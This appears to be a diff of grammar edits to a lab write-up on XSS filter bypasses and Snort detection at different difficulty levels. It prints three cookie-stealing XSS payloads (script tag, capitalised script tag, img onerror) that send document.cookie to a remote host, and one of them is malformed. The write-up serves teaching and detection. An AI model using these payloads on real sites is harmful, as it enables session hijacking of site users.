OWASP Top 10 and Snort Rule Creation

 <script>window.location=’http://172[.]16[.]0[0]102:8080/?cookie=’ + document.cookie</script>

 The medium-difficulty source code is looking for any instance of “script”, but it can be exploited using the script shown below.
-The reason why it works is because it’s case-sensitive.
+The reason why it works is that it’s case-sensitive.
 We can just capitalize “script”.
-The Snort rule will also activate and the remote session will receive the victims cookie.
+The Snort rule will also activate, and the remote session will receive the victim’s cookie.

 <SCRIPT><SCRIPTwindow.location=’http://172[.]16[.]0[0]102:8080/?cookie=’ + document.cookie</script>

-The High difficulty has removed the pattern of “script”.
+The High difficulty has removed the “script” pattern.
 We can exploit HTML Events using the script below.
-The snort rule will also pick this up, and the remote server will receive the victim cookie.
+The Snort rule will also detect this, and the remote server will receive the victim’s cookie.

 <img src/onerror=”var cook = document.cookie; document.location=’http://172[.]16[.]0[.]102:8080/?cookie=’ + cook”>